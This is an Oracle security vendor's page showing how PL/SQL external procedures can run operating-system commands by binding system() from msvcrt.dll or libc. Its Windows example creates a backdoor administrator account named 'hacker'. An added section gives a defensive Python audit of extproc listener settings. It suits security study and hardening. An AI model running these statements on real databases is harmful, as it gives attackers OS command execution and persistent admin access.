
Red-Database-Security GmbH specializes in Oracle security


Run OS commands via PL/SQL and Extproc



Documented way to run OS commands

Requirements
  • The external procedure agent (extproc) is running in the listener
  • Privilege: CREATE ANY LIBRARY
  • Privilege: CREATE (ANY) PROCEDURE
  • 9i+: Environment setting (ENVS) containing the special DLL/library, either
    ENVS="EXTPROC_DLLS=ONLY:/home/xyz/mylib.so:/home/abc/urlib.so"
    or
    ENVS="EXTPROC_DLLS=ANY"
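
A defensive check for the listener requirement above, as an added example that is not part of the original page: it parses a listener.ora fragment and reports every extproc service together with its EXTPROC_DLLS setting, flagging ANY and allowed C runtime libraries. The sample configuration, the SID names and the severity labels are constructed for illustration.

```python
import re

# Constructed listener.ora fragment (sample input, not from the page).
SAMPLE = '''
SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC = (SID_NAME = PLSExtProc) (PROGRAM = extproc)
      (ENVS = "EXTPROC_DLLS=ANY"))
    (SID_DESC = (SID_NAME = ExtLibs) (PROGRAM = extproc)
      (ENVS = "EXTPROC_DLLS=ONLY:/home/xyz/mylib.so:/lib/libc-2.2.5.so"))
    (SID_DESC = (SID_NAME = ExtDefault) (PROGRAM = extproc))
    (SID_DESC = (SID_NAME = ORCL) (ORACLE_HOME = /u01/app/oracle))
  )
'''

# C runtime libraries export system(); both examples on the page bind to one.
RUNTIME = re.compile(r'(?<!\w)(?:libc[-.][\w.-]*|msvcrt\w*\.dll)', re.I)

def sid_desc_blocks(text):
    """Yield every balanced (SID_DESC = ...) block of a listener.ora."""
    for m in re.finditer(r'\(\s*SID_DESC\s*=', text, re.I):
        depth = 0
        for i in range(m.start(), len(text)):
            depth += (text[i] == '(') - (text[i] == ')')
            if depth == 0:
                yield text[m.start():i + 1]
                break

def audit_listener(text):
    """Return (sid_name, severity, reason) for each extproc service."""
    findings = []
    for block in sid_desc_blocks(text):
        if not re.search(r'PROGRAM\s*=\s*extproc\b', block, re.I):
            continue  # ordinary database service, not an extproc agent
        sid = re.search(r'SID_NAME\s*=\s*([^\s)]+)', block, re.I)
        env = re.search(r'EXTPROC_DLLS\s*=\s*([^,"]*)', block, re.I)
        value = env.group(1).strip() if env else ''
        risky = RUNTIME.findall(value)
        if value.upper() == 'ANY':
            result = ('HIGH', 'EXTPROC_DLLS=ANY: any library can be loaded')
        elif risky:
            result = ('HIGH', 'C runtime allowed: ' + ', '.join(risky))
        elif value:
            result = ('REVIEW', 'library list: ' + value)
        else:
            result = ('INFO', 'extproc enabled, EXTPROC_DLLS not set')
        findings.append((sid.group(1) if sid else '?',) + result)
    return findings

if __name__ == '__main__':
    for finding in audit_listener(SAMPLE):
        print(*finding, sep=' | ')
```

If no application uses external procedures, removing the extproc entry from the listener configuration takes away the first requirement entirely.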

Code (Windows):

sqlplus system/manager
SQL> CREATE OR REPLACE LIBRARY exec_shell AS 'C:\windows\system32\msvcrt.dll';
SQL> CREATE OR REPLACE PACKAGE oracmd IS
       PROCEDURE exec(cmdstring IN CHAR);
     END oracmd;
     /

SQL> CREATE OR REPLACE PACKAGE BODY oracmd IS
       PROCEDURE exec(cmdstring IN CHAR)
       IS EXTERNAL NAME "system"
       LIBRARY exec_shell
       LANGUAGE C;
     END oracmd;
     /


Create new Windows Administrator:
SQL> exec oracmd.exec('net user hacker nopassword /ADD');
SQL> exec oracmd.exec('net localgroup /ADD Administrators hacker');



Code (Unix):

sqlplus system/manager
create or replace library exec_shell
as
'/lib/libc-2.2.5.so';
/
create or replace package oracmd is
  procedure exec(cmdstring IN CHAR);
end oracmd;
/

create or replace package body oracmd is
  procedure exec(cmdstring IN CHAR)
  is external
  name "system"
  library exec_shell
  language c;
end oracmd;
/
SQL> exec oracmd.exec('ls');
hello_oracle.txt
PL/SQL procedure successfully completed.


© 2009 by Red-Database-Security GmbH - last update 20-apr-2009